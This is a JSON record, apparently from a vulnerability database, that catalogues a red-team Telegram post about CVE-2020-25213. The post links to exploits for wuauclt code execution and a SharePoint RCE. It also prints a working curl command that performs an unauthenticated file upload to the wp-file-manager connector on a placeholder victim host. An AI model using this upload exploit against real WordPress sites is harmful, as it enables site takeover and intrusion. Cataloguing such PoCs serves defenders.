{"uuid": "ffd4f84a-6dad-43b9-aabd-f6ecd4593d41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-25213", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/1913", "content": "#Red_Team_Tactics\n1. Code execution via the Windows Update client (wuauclt)\nhttps://dtm.uk/wuauclt\n2. PoC for MS SharePoint Server 2019 DataFormWebPart CreateChildControls Server-Side Include RCE Vulnerability (CVE-2020-16952)\nhttps://srcincite.io/pocs/cve-2020-16952.py.txt\n3. Exploiting CVE-2020-25213 - wp-file-manager wordpress plugin (&lt;6.9) for unauthenticated arbitrary file upload\nhttps://medium.com/@mansoorr/exploiting-cve-2020-25213-wp-file-manager-wordpress-plugin-6-9-3f79241f0cd8\nPoC:\ncurl -ks --max-time 5 -F \"reqid=17457a1fe6959\" -F \"cmd=upload\" -F \"target=l1_Lw\" -F \"mtime[]=1576045135\" -F \"upload[]=@/$file_upload\" \"hxxps://victim.com/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php\"\nhttps://github.com/mansoorr123/wp-file-manager-CVE-2020-25213", "creation_timestamp": "2020-12-29T14:05:21.000000Z"}